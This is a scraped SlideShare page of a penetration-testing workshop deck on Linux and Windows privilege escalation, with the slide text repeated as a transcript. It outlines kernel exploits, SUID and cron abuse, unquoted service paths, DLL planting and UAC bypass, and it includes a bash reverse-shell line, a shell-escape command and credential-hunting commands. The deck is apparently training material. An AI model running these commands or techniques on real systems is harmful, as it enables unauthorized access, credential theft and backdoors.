SlideShare a Scribd company logo
1 of 60
Download to read offline
By : Hossam Mohamed
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Privilege Escalation From 1 To 0
About ME
• Hossam Mohamed
• Egyptian , 18 Years Old
• Working As cyber security analyst @ Boraq-Group
• Working in Cyber Security for 2 years :)
• PHP, Python Lover
• GitHub , Twitter , LinkedIn @wazehell
Privilege Escalation From 1 To 0
Understanding Privilege Escalation components
Linux Privilege Escalation
Windows Privilege Escalation
Some Demo's
What Will Be Covered ?
By : Hossam Mohamed
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Why I need Privilege Escalation ?
• Why Everyone Want to get high ?
• Limited Access Or Full Compromised Machine ?
• Opportunity to more maintain access
• More Control
Teg : hacktrick_pef10
For Who
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Privilege
Escalation
Types
Horizontal
Privilege
Escalation
Vertical
Privilege
Escalation
Horizontal
normal user
accesses functions
or content related
for other users
Vertical
also known as
privilege elevation
lower privilege
user>higher
privilege user
Privilege Escalation From 1 To 0
By : Hossam Mohamed
vertical privilegeescalation
is what will talk about
Lower
privilege
user
Higher
privilege
user
Privilege Escalation From 1 To 0
By : Hossam Mohamed
vertical privilegeescalation
is what will talk about
Lower
privilege
user
Higher
privilege
user
System Root
Sudo
Users
-
Services Users
Adminisrators
P Users
Users
-
Services Users
Privilege Escalation From 1 To 0
By : Hossam Mohamed
vertical privilegeescalation
is what will talk about
Lower
privilege
user
Higher
privilege
user
Windows
• Known exploits
• vulnerable
windows
services
• misconfigurations
Linux
• Kernel Exploit
• Known Exploits
• Exploiting
Services
• Exploiting Sudo
Users
• misconfigurations
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Let's Talk A little bit about
Kernel
• A kernel is the core component of
any operating system
• Low level task (disk management ,
memory management)
• Memory management and I/O
• Link Between Hardware (I/O) , Apps ,
CPU and Memory .
• Device management through the use
of device drivers
kernel is responsible !
Privilege Escalation From 1 To 0
By : Hossam Mohamed
We Don't Need to know too much about
kernel at this moment
Privilege Escalation From 1 To 0
By : Hossam Mohamed
MES
Misconfiguration
Exploit Vulnerable Service
Privilege Escalation From 1 To 0
By : Hossam Mohamed
MES
Misconfiguration
Exploit
Vulnerable Service
• VulnerableMachine
• Exploit !
• Ability To Move
Exploit
• Ability To Compile
and Run
• SUID
• Sudo Users
• Weak file's
Permissions
• And many more
• We will talk
about that a
lot
Privilege Escalation From 1 To 0
By : Hossam Mohamed
start with Linux
• Kernel Exploitation
• Weak password of high privilegeusers
• file with weak permission
• Configurations, Logs files
• History
• Env , $PATH
• Shell Escape
• VulnerableApp / Service
• Weak permissionof Jobs/Task
• Sudoer
• System Misconfiguration
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Kernel Exploits
• Kernel Exploits
• Find Stable One Or die()
• MCE (Move – compile – Execute)
• Problems with Kernel Expliots
• Dirty Cow :)
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Dirty Cow
• October 2016
• W Access to Memory Mappings
• Inject Or In other word write code into
privileged files
• Flaw in kernel’s memory subsystem which
handles the copy-on-write
Privilege Escalation From 1 To 0
By : Hossam Mohamed
It's Not A Cow
• copy-on-write (COW) !
• W Access to Memory Mappings
• Inject Or In other word write code into
privileged files
• Flaw in kernel’s memory subsystem which
handles the copy-on-write
• Demo
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Password Attacks
# Passwords Every where
Check users without passwords .. maybe you got more privilege !
Check For credentials
Are you sudo ! , check etc/shadow
John the Ripper are here
Password mining (configs – logs – bash_history)
Password Policy Weakness
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Password Attacks
Understanding /etc/passwd
1 => username !
2 => password
3 => UID
4 => GID
5 => UserInfo
6 => Home Dir
7 => Shell
All passwords in /etc/shadow
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Password Attacks
Log , History
Cat ~/.bash_history | grep –text "ssh"
Or whatever you can pass the password via command line
Maybe Web cms configs !
Admin notes
Keys
And many more !
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Escape to shell
Restricted Shells Its limiting user's ability and only allows them to
perform a subset of system commands
# so how to kill !
# Development environment (python , perl , ruby , go , php .. etc)
# Redirecting output using redirection operators like >, >>, >|,&>
# Using the 'exec' built like "find . -exec "/bin/bash" ;"
# unsetting certain environment variables
#Specifying filenames or command names that contain slashes.
Restricted Shell
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Escape to shell
Restricted Shells Its limiting user's ability and only allows them to
perform a subset of system commands
# so how to kill !
# Development environment (python , perl , ruby , go , php .. etc)
# Redirecting output using redirection operators like >, >>, >|,&>
# Using the 'exec' built like "find . -exec "/bin/bash" ;"
# unsetting certain environment variables
#Specifying filenames or command names that contain slashes.
Restricted Shell
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Cron Jobs .. Time Game :)
# What is Cron Jobs
Cron jobs, if not configured properly can be exploited to get root
privilege.
# script or binaries in cron jobs to be writable
# Is cron.d directory writable
# Can we write over the cron file itself.
ls -la /etc/cron.d
find /etc/cron* -perm -
0002 -type f -exec ls -la
{} ; -exec cat {}
2>/dev/null ;
bash -i >& /dev/tcp/127.0.0.1/4444 0>&1
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Sudo
• Super User Pls Do It !
• Run With Others
• Cat /etc/sudoers
• What Sudoers Can do 1
Privilege Escalation From 1 To 0
By : Hossam Mohamed
# File Permissions
• Check Files .
• Edit And Run :)
• More !
R = read => 4
W = write => 2
X = execute =>1
Privilege Escalation From 1 To 0
By : Hossam Mohamed
# SUID Files
Allows you to run programs as another user upon
execution
Or in other word (with root)
Local Exploits or BoF in SUID app will make you
run as root
SUID Files
find / -user root -
perm -4000 -print
2>/dev/null
find / -perm -u=s -
type f 2>/dev/null
find / -user root -
perm -4000 -exec ls -
ldb {} ;
Privilege Escalation From 1 To 0
By : Hossam Mohamed
SUID Files
find / -user root -
perm -4000 -print
2>/dev/null
find / -perm -u=s -
type f 2>/dev/null
find / -user root -
perm -4000 -exec ls -
ldb {} ;
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Environment Variables
# Dynamic linker
# What's Dynamic linker
Dot In PATH !
Privilege Escalation From 1 To 0
By : Hossam Mohamed
misconfigurations
Webserver => Configs => credential's
What if we got MySQL credential's
Known Services Exploits
modern Linux distributions security
ps -ef | grep root
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Exercise
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Day 2
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Windows Access Control
Only "NTFS" formatted drive
Cacls output
• F (full access), M (modify access), RX (read and execute access)
• R (read-only access) ,W (write-only access)
#
• (OI): object inherit, (CI): container inherit
• (IO): inherit only, (NP): do not propagate inherit
• (I): permissioninherited from parent container
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Windows integrity levels (IL)
Untrusted
Low
Medium
High
System
Protected/Installer
Check your user if local admin !!
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Windows Files Premonitions
Overwrite is always big plus
Identify writeable files
Recently Created Directories
default permissions
i/cacls utility
Accesschk tool
Write Read & Execute
Read Full
Privilege Escalation From 1 To 0
By : Hossam Mohamed
From Local Admin To Domain Admin
Pass The Hash
Hashdump
RDP,
Add new Domain
Admin
Have Some Fun
IT
Admin
Box
Local
Box
Domain
Box
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Stealing NTLM
From Web !!
Automatic Logon Policy (Win HTTP)
https://github.com/blazeinfosec/ssrf-ntlm/
MySQL
LOAD DATA INFILE
qprocess /server:15.15.45.41
Nltest
Outlook CVE-2018-0950
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Stealing NTLM
Outlook CVE-2018-0950
Privilege Escalation From 1 To 0
By : Hossam Mohamed
User Account Control (UAC)
• security feature of Windows isn't ! :)
• Not a Security Boundary
• prevent unauthorized changes to the operating system
(Run App ..etc)
• So UAC Is Issue For a pen tester !!
UAC Bypass
1. COM Handler Hijack
2. Memory Injection
3. Some Registry Keys like (FodHelper - Eventvwr)
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Credentials
Credentials are everywhere .
Configs - Backups
Admin notes – Plaintext Passwords
Encrypted Credentials
Cashed Credentials (ftp – vnc .. Etc)
Post/windows/gather/credentials/*
grep => findstr
c:sysprep.inf
c:sysprep
c:sysprep.xml
c:Unattended.xml
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Credentials
Passwords in registry’s
Putty – snmp
reg query HKLM /f password /t REG_SZ /s
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Credentials
Have Groups.xml !
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt
Password In Paper !
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Users Information
Local Administrators Check
net localgroup administrators
Domain user listing
Get-ADUser -Filter * -SearchBase "dc=domain,dc=local" | select Name,SID
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Users Information
UserListing
Net users
Sessions
qwinsta
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Massing patches
Kernel Exploits
Discovery of Missing Patches
wmic qfe get
Caption,Description,HotFixID,InstalledOn
Or kill AV
post/windows/gather/enum_patches
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Applications Local Exploit
Our friend exploit-db
Maybe it’s not about Privilege escalation exploits only
RCE system privilege!!
You maybe have other way !
post/multi/recon/local_exploit_suggester
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Services exploitation
As we see , windows privilege escalation exploitation tecnics
will start from here ☺
Quick look at exploit db
More then 60% of windows privilege escalation exploitation
about services!
It’s sound like ohh I thin that’s easy
Good to have powershell knowledge
Let’s get involved!!
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Services exploitation
Identify running services.
Net config / services under your control
Say hello to your new friend “sc”
What’s sc ?
Sc query /list all of the services on the machine
post/windows/gather/enum_services
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Services exploitation
Let’s start analysis what we got !
Local administrator or services account!
Local System - Network Service - Local Service
Do you really want to get other limited shell ?
Just Get Hash’s and go home to crack and come back
Get-ADDefaultDomainPasswordPolicy / I thin you will know how much
time it will take to crack it !!
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Services exploitation
Normal Service Exploitation some checks
Services are automatically starting?
Services are controlled?
Can you overwrite Service binary?
Congratulations you own the box
Note : “in modern os sometimes, when you replace services
binary with metasploit payload you will lose the shell after 1
min that’s bcs the app crash , so make sure that your payload
is about simple task ! “ like install backdoor or add user
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Services exploitation
Want some CVE into your CV ? I will tell you a trick :”)
“Unquoted services paths” or trusted paths
What’s that ?
It’s about space and “
C:Program Filesblabla appstart.exe
C:Program*Filesblabla*appstart.exe
All of the * are vulnerable points
If you failed in A plan ,
there are other 25
alphabet to try with it
:”)
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Services exploitation
Identify Unquoted services
wmic service get name,displayname,pathname,startmode |findstr /i
“auto” |findstr /i /v “c:windows” |findstr /i /v “””
Identify services account level !!
Check Write access !
Icacls /Service path/
Check control
Net config | findstr services name
Or if it’s automatically start , check if you can restart the box
exploit/windows/local/trusted_service_path
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Services exploitation
Registry Permissions
It’s not common “Adminisrators only who have write prem by default “
But ! It’s easy to exploit
Services listing in regedit
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetservi
ces
Take look and check if you can change the path !
Good luck!
If you are in windows
box
GUI access is just a
option
It’s depends on you !
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Named pipes exploitation
What’s Pipes ?!
IO ninja
Pipeslist
check your pipes
Metasploit : getsystem
Fuzzing demo
Privilege Escalation From 1 To 0
By : Hossam Mohamed
DLL Injection
Windowscan dynamicallyload DLLs
What if DLL is Missing ?
LoadLibrary(“iamalib.dll”)
LoadLibrary(“c:program filesiamalib.dll”)
Privilege Escalation From 1 To 0
By : Hossam Mohamed
DLL Injection
Not found ?
Windowsattempts to locate the DLL by searching a well-defined
set of directories
"DLL preloading attack or a binary planting attack"
How the searching operate work ?
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControl
Session ManagerKnownDLLs
Privilege Escalation From 1 To 0
By : Hossam Mohamed
More Exploits
CVE-2018-1038 Total Meltdown
Windows 7 & 2008 R2
Some Kernel Exploits Windows 10
https://blog.xpnsec.com/total-meltdown-cve-2018-1038/
Also There are a good book for kernel exploitation
"A Guide to Kernel Exploitation: Attacking the Core"
Privilege Escalation From 1 To 0
By : Hossam Mohamed
AutoRun
AutoRuns tool
Check Paths
Can You Overwrite ?
Restart
Got SYSTEM Account :")
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Binary Replacements
Check Imported Binary
C:WindowsSystem32sethc.exe
Registers Check
• RunAs
• RunOnce
• RenameOnReboot
• AlwaysInstallElevated
• SRP Policy Enumeration
Privilege Escalation From 1 To 0
By : Hossam Mohamed
Other Checks
• Virtual Image Backups / Storage
VMDK - VHD / VHDX - OVA - ISO – IMG
• Source code of applications running
• Default passwords for installed applications
• Default configuration file locations
What's Stored on Network Shares ?
Task manager
Privilege Escalation From 1 To 0
By : Hossam Mohamed
I Think This the end :")
Nice To Meet You All !!
@wazehell
Privilege Escalation From 1 To 0
By : Hossam Mohamed

More Related Content

What's hot

Pen Testing Explained
Pen Testing ExplainedPen Testing Explained
Pen Testing Explained
Rand W. Hirt
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
Software Guru
 

What's hot (20)

How fun of privilege escalation Red Pill2017
How fun of privilege escalation  Red Pill2017How fun of privilege escalation  Red Pill2017
How fun of privilege escalation Red Pill2017
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
 
Footprinting and reconnaissance
Footprinting and reconnaissanceFootprinting and reconnaissance
Footprinting and reconnaissance
 
Security testing
Security testingSecurity testing
Security testing
 
Penetration testing reporting and methodology
Penetration testing reporting and methodologyPenetration testing reporting and methodology
Penetration testing reporting and methodology
 
Pen Testing Explained
Pen Testing ExplainedPen Testing Explained
Pen Testing Explained
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
 
How to Test for The OWASP Top Ten
 How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
 
Reconnaissance
ReconnaissanceReconnaissance
Reconnaissance
 
Nessus-Vulnerability Tester
Nessus-Vulnerability TesterNessus-Vulnerability Tester
Nessus-Vulnerability Tester
 
Pentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarPentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang Bhatnagar
 
Introduction to Malware Analysis
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware Analysis
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
 
Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & Inconsistency
 
Vulnerability assessment and penetration testing
Vulnerability assessment and penetration testingVulnerability assessment and penetration testing
Vulnerability assessment and penetration testing
 
Vulnerability and Assessment Penetration Testing
Vulnerability and Assessment Penetration TestingVulnerability and Assessment Penetration Testing
Vulnerability and Assessment Penetration Testing
 
OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
 

Similar to Privilege escalation from 1 to 0 Workshop

BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat Security Conference
 
Utilizing the Xen Hypervisor in business practice - Bryan Fusilier
Utilizing the Xen Hypervisor in business practice - Bryan FusilierUtilizing the Xen Hypervisor in business practice - Bryan Fusilier
Utilizing the Xen Hypervisor in business practice - Bryan Fusilier
Matthew Turland
 
Presentation nix
Presentation nixPresentation nix
Presentation nix
fangjiafu
 
Presentation nix
Presentation nixPresentation nix
Presentation nix
fangjiafu
 
Mayhem malware
Mayhem malwareMayhem malware
Mayhem malware
Akash Deep
 

Similar to Privilege escalation from 1 to 0 Workshop (20)

Linux privesc.pptx
Linux privesc.pptxLinux privesc.pptx
Linux privesc.pptx
 
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deception
 
1000 to 0
1000 to 01000 to 0
1000 to 0
 
Utilizing the Xen Hypervisor in business practice - Bryan Fusilier
Utilizing the Xen Hypervisor in business practice - Bryan FusilierUtilizing the Xen Hypervisor in business practice - Bryan Fusilier
Utilizing the Xen Hypervisor in business practice - Bryan Fusilier
 
The Complete CTF Road Map
The Complete CTF Road Map The Complete CTF Road Map
The Complete CTF Road Map
 
Windows Privilege Escalation
Windows Privilege EscalationWindows Privilege Escalation
Windows Privilege Escalation
 
unit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfunit 2 confinement techniques.pdf
unit 2 confinement techniques.pdf
 
Practical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post ExploitationPractical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post Exploitation
 
Windows Malware Techniques
Windows Malware TechniquesWindows Malware Techniques
Windows Malware Techniques
 
Presentation nix
Presentation nixPresentation nix
Presentation nix
 
Presentation nix
Presentation nixPresentation nix
Presentation nix
 
Gwc3
Gwc3Gwc3
Gwc3
 
Check Your Privilege (Escalation)
Check Your Privilege (Escalation) Check Your Privilege (Escalation)
Check Your Privilege (Escalation)
 
Understanding salt modular sub-systems and customization
Understanding salt   modular sub-systems and customizationUnderstanding salt   modular sub-systems and customization
Understanding salt modular sub-systems and customization
 
Mayhem malware
Mayhem malwareMayhem malware
Mayhem malware
 
Anton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin on Discovering That Your Linux Box is HackedAnton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin on Discovering That Your Linux Box is Hacked
 
How to build an admin guy
How to build an admin guyHow to build an admin guy
How to build an admin guy
 
Owning computers without shell access dark
Owning computers without shell access darkOwning computers without shell access dark
Owning computers without shell access dark
 
Introduction to Linux Privilege Escalation Methods
Introduction to Linux Privilege Escalation MethodsIntroduction to Linux Privilege Escalation Methods
Introduction to Linux Privilege Escalation Methods
 
Your Inner Sysadmin - MidwestPHP 2015
Your Inner Sysadmin - MidwestPHP 2015Your Inner Sysadmin - MidwestPHP 2015
Your Inner Sysadmin - MidwestPHP 2015
 

Recently uploaded

Hyatt driving innovation and exceptional customer experiences with FIDO passw...
Hyatt driving innovation and exceptional customer experiences with FIDO passw...Hyatt driving innovation and exceptional customer experiences with FIDO passw...
Hyatt driving innovation and exceptional customer experiences with FIDO passw...
FIDO Alliance
 
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptx
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptxHarnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptx
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptx
FIDO Alliance
 
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc
 

Recently uploaded (20)

WebRTC and SIP not just audio and video @ OpenSIPS 2024
WebRTC and SIP not just audio and video @ OpenSIPS 2024WebRTC and SIP not just audio and video @ OpenSIPS 2024
WebRTC and SIP not just audio and video @ OpenSIPS 2024
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
Navigating Identity and Access Management in the Modern Enterprise
Navigating Identity and Access Management in the Modern EnterpriseNavigating Identity and Access Management in the Modern Enterprise
Navigating Identity and Access Management in the Modern Enterprise
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
Modernizing Legacy Systems Using Ballerina
Modernizing Legacy Systems Using BallerinaModernizing Legacy Systems Using Ballerina
Modernizing Legacy Systems Using Ballerina
 
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityPlatformless Horizons for Digital Adaptability
Platformless Horizons for Digital Adaptability
 
2024 May Patch Tuesday
2024 May Patch Tuesday2024 May Patch Tuesday
2024 May Patch Tuesday
 
Hyatt driving innovation and exceptional customer experiences with FIDO passw...
Hyatt driving innovation and exceptional customer experiences with FIDO passw...Hyatt driving innovation and exceptional customer experiences with FIDO passw...
Hyatt driving innovation and exceptional customer experiences with FIDO passw...
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
API Governance and Monetization - The evolution of API governance
API Governance and Monetization -  The evolution of API governanceAPI Governance and Monetization -  The evolution of API governance
API Governance and Monetization - The evolution of API governance
 
Introduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMIntroduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDM
 
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptx
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptxHarnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptx
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptx
 
Design Guidelines for Passkeys 2024.pptx
Design Guidelines for Passkeys 2024.pptxDesign Guidelines for Passkeys 2024.pptx
Design Guidelines for Passkeys 2024.pptx
 
Less Is More: Utilizing Ballerina to Architect a Cloud Data Platform
Less Is More: Utilizing Ballerina to Architect a Cloud Data PlatformLess Is More: Utilizing Ballerina to Architect a Cloud Data Platform
Less Is More: Utilizing Ballerina to Architect a Cloud Data Platform
 
Choreo: Empowering the Future of Enterprise Software Engineering
Choreo: Empowering the Future of Enterprise Software EngineeringChoreo: Empowering the Future of Enterprise Software Engineering
Choreo: Empowering the Future of Enterprise Software Engineering
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
How to Check CNIC Information Online with Pakdata cf
How to Check CNIC Information Online with Pakdata cfHow to Check CNIC Information Online with Pakdata cf
How to Check CNIC Information Online with Pakdata cf
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
 
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
 

Privilege escalation from 1 to 0 Workshop

  • 1. By : Hossam Mohamed Privilege Escalation From 1 To 0
  • 2. By : Hossam Mohamed Privilege Escalation From 1 To 0 About ME • Hossam Mohamed • Egyptian , 18 Years Old • Working As cyber security analyst @ Boraq-Group • Working in Cyber Security for 2 years :) • PHP, Python Lover • GitHub , Twitter , LinkedIn @wazehell
  • 3. Privilege Escalation From 1 To 0 Understanding Privilege Escalation components Linux Privilege Escalation Windows Privilege Escalation Some Demo's What Will Be Covered ? By : Hossam Mohamed
  • 4. Privilege Escalation From 1 To 0 By : Hossam Mohamed Why I need Privilege Escalation ? • Why Everyone Want to get high ? • Limited Access Or Full Compromised Machine ? • Opportunity to more maintain access • More Control Teg : hacktrick_pef10 For Who
  • 5. Privilege Escalation From 1 To 0 By : Hossam Mohamed Privilege Escalation Types Horizontal Privilege Escalation Vertical Privilege Escalation Horizontal normal user accesses functions or content related for other users Vertical also known as privilege elevation lower privilege user>higher privilege user
  • 6. Privilege Escalation From 1 To 0 By : Hossam Mohamed vertical privilegeescalation is what will talk about Lower privilege user Higher privilege user
  • 7. Privilege Escalation From 1 To 0 By : Hossam Mohamed vertical privilegeescalation is what will talk about Lower privilege user Higher privilege user System Root Sudo Users - Services Users Adminisrators P Users Users - Services Users
  • 8. Privilege Escalation From 1 To 0 By : Hossam Mohamed vertical privilegeescalation is what will talk about Lower privilege user Higher privilege user Windows • Known exploits • vulnerable windows services • misconfigurations Linux • Kernel Exploit • Known Exploits • Exploiting Services • Exploiting Sudo Users • misconfigurations
  • 9. Privilege Escalation From 1 To 0 By : Hossam Mohamed Let's Talk A little bit about Kernel • A kernel is the core component of any operating system • Low level task (disk management , memory management) • Memory management and I/O • Link Between Hardware (I/O) , Apps , CPU and Memory . • Device management through the use of device drivers kernel is responsible !
  • 10. Privilege Escalation From 1 To 0 By : Hossam Mohamed We Don't Need to know too much about kernel at this moment
  • 11. Privilege Escalation From 1 To 0 By : Hossam Mohamed MES Misconfiguration Exploit Vulnerable Service
  • 12. Privilege Escalation From 1 To 0 By : Hossam Mohamed MES Misconfiguration Exploit Vulnerable Service • VulnerableMachine • Exploit ! • Ability To Move Exploit • Ability To Compile and Run • SUID • Sudo Users • Weak file's Permissions • And many more • We will talk about that a lot
  • 13. Privilege Escalation From 1 To 0 By : Hossam Mohamed start with Linux • Kernel Exploitation • Weak password of high privilegeusers • file with weak permission • Configurations, Logs files • History • Env , $PATH • Shell Escape • VulnerableApp / Service • Weak permissionof Jobs/Task • Sudoer • System Misconfiguration
  • 14. Privilege Escalation From 1 To 0 By : Hossam Mohamed Kernel Exploits • Kernel Exploits • Find Stable One Or die() • MCE (Move – compile – Execute) • Problems with Kernel Expliots • Dirty Cow :)
  • 15. Privilege Escalation From 1 To 0 By : Hossam Mohamed Dirty Cow • October 2016 • W Access to Memory Mappings • Inject Or In other word write code into privileged files • Flaw in kernel’s memory subsystem which handles the copy-on-write
  • 16. Privilege Escalation From 1 To 0 By : Hossam Mohamed It's Not A Cow • copy-on-write (COW) ! • W Access to Memory Mappings • Inject Or In other word write code into privileged files • Flaw in kernel’s memory subsystem which handles the copy-on-write • Demo
  • 17. Privilege Escalation From 1 To 0 By : Hossam Mohamed Password Attacks # Passwords Every where Check users without passwords .. maybe you got more privilege ! Check For credentials Are you sudo ! , check etc/shadow John the Ripper are here Password mining (configs – logs – bash_history) Password Policy Weakness
  • 18. Privilege Escalation From 1 To 0 By : Hossam Mohamed Password Attacks Understanding /etc/passwd 1 => username ! 2 => password 3 => UID 4 => GID 5 => UserInfo 6 => Home Dir 7 => Shell All passwords in /etc/shadow
  • 19. Privilege Escalation From 1 To 0 By : Hossam Mohamed Password Attacks Log , History Cat ~/.bash_history | grep –text "ssh" Or whatever you can pass the password via command line Maybe Web cms configs ! Admin notes Keys And many more !
  • 20. Privilege Escalation From 1 To 0 By : Hossam Mohamed Escape to shell Restricted Shells Its limiting user's ability and only allows them to perform a subset of system commands # so how to kill ! # Development environment (python , perl , ruby , go , php .. etc) # Redirecting output using redirection operators like >, >>, >|,&> # Using the 'exec' built like "find . -exec "/bin/bash" ;" # unsetting certain environment variables #Specifying filenames or command names that contain slashes. Restricted Shell
  • 21. Privilege Escalation From 1 To 0 By : Hossam Mohamed Escape to shell Restricted Shells Its limiting user's ability and only allows them to perform a subset of system commands # so how to kill ! # Development environment (python , perl , ruby , go , php .. etc) # Redirecting output using redirection operators like >, >>, >|,&> # Using the 'exec' built like "find . -exec "/bin/bash" ;" # unsetting certain environment variables #Specifying filenames or command names that contain slashes. Restricted Shell
  • 22. Privilege Escalation From 1 To 0 By : Hossam Mohamed Cron Jobs .. Time Game :) # What is Cron Jobs Cron jobs, if not configured properly can be exploited to get root privilege. # script or binaries in cron jobs to be writable # Is cron.d directory writable # Can we write over the cron file itself. ls -la /etc/cron.d find /etc/cron* -perm - 0002 -type f -exec ls -la {} ; -exec cat {} 2>/dev/null ; bash -i >& /dev/tcp/127.0.0.1/4444 0>&1
  • 23. Privilege Escalation From 1 To 0 By : Hossam Mohamed Sudo • Super User Pls Do It ! • Run With Others • Cat /etc/sudoers • What Sudoers Can do 1
